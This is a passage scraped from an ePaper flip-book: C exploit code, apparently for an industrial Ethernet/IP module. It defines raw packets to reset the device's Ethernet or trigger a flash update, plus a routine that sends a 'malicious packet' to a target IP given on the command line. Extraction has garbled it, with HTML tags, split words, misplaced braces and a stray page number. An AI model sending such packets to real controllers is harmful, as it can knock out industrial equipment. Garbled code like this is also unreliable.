Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
unsigned char packetResetEth[]=<br />
"\x00\x00\x00\x00\x00\x04\x02\x00\x00\x00\x00\x00\xb2\x00\x08\x00"<br />
"\x05\x03\x20\x01\x24\x01\x30\x03";<br />
unsigned char packetFlashUp[]=<br />
"\x00\x00\x00\x00\x05\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x16\x00"<br />
"\x4b\x02\x20\xa1\x24\x01\x05\x99\x07\x00\x4f\x02\x20\x37\x24\xc8"<br />
"\x00\x00\x01\x00\x01\x00";<br />
/* ------- */<br />
bool forgePacket( unsigned char *packet, UINT32 len, UINT32 <strong>com</strong>mID, SOCKET<br />
client)<br />
{<br />
ENCAP_H *pHeader;<br />
void *pReq;<br />
pHeader = ( ENCAP_H* ) calloc( 1, sizeof( ENCAP_H ) );<br />
pReq = ( void* ) calloc( 0x200, 1 );<br />
pHeader->iEncaph_<strong>com</strong>mand = <strong>com</strong>mID;<br />
pHeader->iEncaph_length = len;<br />
pHeader->lEncaph_session = g_SessionId;<br />
memcpy( pReq,<br />
pHeader,<br />
sizeof( ENCAP_H ));<br />
memcpy( ( (UINT8*)pReq + sizeof( ENCAP_H ) ),<br />
packet,<br />
len );<br />
printf("[+] Sending malicious packet...");<br />
printf("%X\n",send(client, (const char*)pReq, len + sizeof( ENCAP_H ),<br />
NULL ));<br />
recv(client, (char*)pReq, 0x10, NULL );<br />
}<br />
return true;<br />
int main(int argc, char* argv[])<br />
{<br />
WSADATA ws;<br />
SOCKET enbt_socket;<br />
struct sockaddr_in peer;<br />
ENCAP_H *pHeader;<br />
REQ_SESSION *pSession;<br />
void *pReply;<br />
void *pReq,*pReq2;<br />
int i;<br />
{<br />
}<br />
if( argc != 2 )<br />
printf("\nusage: exploit.exe ip ");<br />
exit(0);<br />
WSAStartup(0x0202,&ws);<br />
peer.sin_family = AF_INET;<br />
peer.sin_port = htons( ENBT_PORT );<br />
peer.sin_addr.s_addr = inet_addr( argv[1] );<br />
enbt_socket = socket(AF_INET, SOCK_STREAM, 0);<br />
pHeader = ( ENCAP_H* ) calloc( 1, sizeof( ENCAP_H ) );<br />
pSession = ( REQ_SESSION* ) calloc( 1, sizeof ( REQ_SESSION ) );<br />
23